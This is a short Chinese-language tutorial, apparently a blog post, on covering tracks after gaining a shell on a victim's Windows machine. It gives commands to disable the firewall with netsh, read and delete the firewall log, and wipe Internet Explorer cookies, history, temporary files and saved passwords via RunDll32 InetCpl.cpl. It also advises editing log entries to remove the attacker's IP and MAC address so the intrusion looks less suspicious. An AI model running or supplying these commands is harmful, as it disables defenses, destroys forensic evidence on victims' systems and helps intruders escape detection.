1、參考文章
2、推薦關注領英
前提環境:我們已經拿到了目標的shell,現在準備清理防火墻記錄的痕跡。
cd logfiles/firewall
觀察防火墻的當前目錄
type pfirewall.log
讀取防火墻日志
Netsh firewall set opmode mode= DISABLE
關閉防火墻
Del pfirewall.log
刪除日志文件
type pfirewall.log
驗證日志文件是否還在
注:這樣是真的省事,可是少了大量日志記錄,還是會被發現異常,所以刪除帶有自己訪問記錄的條目,或者修改日志內容是最好的選擇。把自己的訪問ip和,mac記錄刪除或者修改掉。
個人感覺,刪除不是好的選擇,你斷開連接的時候,有的監管軟件會記錄你的離開,審核日志的時候,你有離開的記錄,沒有進入的記錄,這就很讓人懷疑了。
另:在遠程受害者PC中刪除Internet Explorer的密碼/ Cookies /歷史/臨時Internet文件
參考文章
刪除Internet臨時文件
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8
刪除cookies
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2
刪除歷史記錄
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1
從數據中刪除
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16
刪除密碼
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32
刪除所有
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255
刪除加載項存儲的所有+文件和設置
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351
